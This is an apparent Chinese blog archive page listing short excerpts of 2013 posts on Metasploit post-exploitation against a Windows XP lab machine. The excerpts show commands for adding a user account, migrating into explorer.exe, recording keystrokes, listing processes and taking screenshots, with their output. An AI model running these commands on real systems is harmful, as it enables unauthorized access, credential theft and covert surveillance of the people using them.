2013年11月20日
摘要: net user test 123456 /add 阅读全文
posted @ 2013-11-20 10:23 语辰 阅读(487) 评论(0) 推荐(0) 编辑
摘要: meterpreter > migrate 1548[*] Migrating to 1548...[*] Migration completed successfully.meterpreter > run post/windows/capture/keylog_recorder在被攻击者主机上进行操作在攻击机上ctrl+c中止,然后cat 文件,看捕获到的内容 阅读全文
posted @ 2013-11-20 10:21 语辰 阅读(549) 评论(0) 推荐(0) 编辑
摘要: 1548 1500 explorer.exe x86 0 LIXIULI-VCS86VR\test C:\WINDOWS\Explorer.EXE 1944 1548 vmtoolsd.exe x86 0 LIXIULI-VCS86VR\test C:\Program Files\VMware\VMware Tools\vmtoolsd.exe 1960 1548 ctfmon.exe x86 0 LIXIULI-VCS86VR\testC:\WINDOWS\System32\ctfmon.ex... 阅读全文
posted @ 2013-11-20 10:17 语辰 阅读(348) 评论(0) 推荐(0) 编辑
摘要: meterpreter > psProcess List============ PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 0 0 [System Process] 4294967295 4 0 Sy... 阅读全文
posted @ 2013-11-20 10:07 语辰 阅读(232) 评论(0) 推荐(0) 编辑
摘要: meterpreter > sysinfoComputer : test-VCS86VROS : Windows XP (Build 2600).Architecture : x86System Language : zh_CNMeterpreter : x86/win32meterpreter > 阅读全文
posted @ 2013-11-20 10:05 语辰 阅读(138) 评论(0) 推荐(0) 编辑
摘要: meterpreter > screenshotScreenshot saved to: /opt/metasploit/msf3/wLafQYhx.jpegmeterpreter > /usr/bin/www-browser: /opt/metasploit/common/lib/libcrypto.so.0.9.8: no version information available (required by /usr/bin/www-browser)/usr/bin/www-browser: /opt/metasploit/common/lib/libssl.so.0.9.8: 阅读全文
posted @ 2013-11-20 10:04 语辰 阅读(381) 评论(0) 推荐(0) 编辑